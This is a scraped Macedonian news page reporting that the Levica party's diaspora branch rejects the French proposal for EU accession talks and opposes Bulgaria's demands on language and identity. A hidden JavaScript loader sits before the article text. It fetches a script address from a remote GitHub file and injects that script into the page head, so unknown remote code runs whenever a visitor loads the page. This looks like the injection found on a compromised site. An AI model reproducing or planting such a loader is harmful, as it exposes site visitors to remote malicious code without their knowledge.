;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Фото) Левица: Македонците од дијаспората велат „НЕ“ за бугаризација на Македонија - Антропол
АктуелноЛокално

(Фото) Левица: Македонците од дијаспората велат „НЕ“ за бугаризација на Македонија

  • Реакција на Левица – Дијаспора

Сите Македонци од дијаспората, коишто живеат и работат надвор од Македонија, исто како и Македонците резиденти на Македонија, се изјаснија против францускиот предлог за преговори за влез во ЕУ на Република Македонија. Тие покажувајќи солидарност и поддршка, го оправдуваат револтот на македонскиот народ изразен преку протестите.

Левица Дијаспора смета дека не треба да сме некакви експерти за да разбереме што Бугарија бара од нас за да станеме членка на ЕУ и дека францускиот предлог не е никаква гаранција дека Бугарија нема да диктира и бара понатамошни промени во јазикот и идентитетот на македонскиот народ. Преговорите со Бугарија треба итно да престанат, затоа што за барањата какви ги има Бугарија, не се преговара, а уште помалку се прават отстапки и компромиси.

Затоа, дијаспората се обедини со едногласна порака и транспаренти од Македонци насекаде низ светот, да испрати порака до македонскиот врв дека ние не преговараме со ФАШИСТИ и дека Македонија не е на распродажба на ЕУ – пазарот.

Или слушнете го народот, или поднесете си оставка!